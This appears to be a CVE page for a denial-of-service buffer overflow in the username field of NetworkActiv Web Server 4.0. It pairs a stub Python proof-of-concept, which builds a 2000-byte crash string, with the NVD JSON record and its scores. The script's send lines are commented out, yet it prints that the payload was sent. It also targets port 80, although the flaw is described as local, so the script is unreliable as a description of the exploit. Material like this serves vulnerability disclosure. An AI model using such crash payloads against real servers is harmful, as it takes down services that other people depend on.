CVE-2018-25235

import socket import sys # Target configuration TARGET_IP = '127.0.0.1' TARGET_PORT = 80 # Assuming default web port, adjust if needed # Generate payload: 2000 'A's to trigger buffer overflow payload = b'A' * 2000 def send_exploit(): try: # Construct a malicious request targeting the username setting interface # Note: The actual HTTP endpoint or protocol format depends on the specific application implementation. # This is a conceptual PoC demonstrating the payload delivery. # Example header construction (hypothetical) buffer_overflow_trigger = payload print(f"[*] Sending payload to {TARGET_IP}...") # Depending on the service, this might be an HTTP POST or a proprietary protocol packet. # Here we simulate a simple socket interaction. # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect((TARGET_IP, TARGET_PORT)) # s.send(buffer_overflow_trigger) # s.close() print("[+] Payload sent. If successful, the application should crash.") print(f"[+] Payload length: {len(payload)}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": send_exploit()

{"cve": {"id": "CVE-2018-25235", "sourceIdentifier": "[email protected]", "published": "2026-03-30T12:16:17.720", "lastModified": "2026-04-08T16:35:29.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NetworkActiv Web Server 4.0 contains a buffer overflow vulnerability in the username field of the Security options that allows local attackers to crash the application by supplying an excessively long string. Attackers can trigger a denial of service by entering a crafted username value exceeding the expected buffer size through the Set username interface."}, {"lang": "es", "value": "NetworkActiv Web Server 4.0 contiene una vulnerabilidad de desbordamiento de búfer en el campo de nombre de usuario de las opciones de Seguridad que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga. Los atacantes pueden desencadenar una denegación de servicio al introducir un valor de nombre de usuario manipulado que excede el tamaño de búfer esperado a través de la interfaz Establecer nombre de usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:networkactiv:web_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0", "matchCriteriaId": "15BF7660-AB29-4291-9D18-2A120E7A76B3"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/45302", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.networkactiv.com/Dev/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.networkactiv.com/WebServer.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/networkactiv-web-server-username-field-buffer-overflow-dos", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}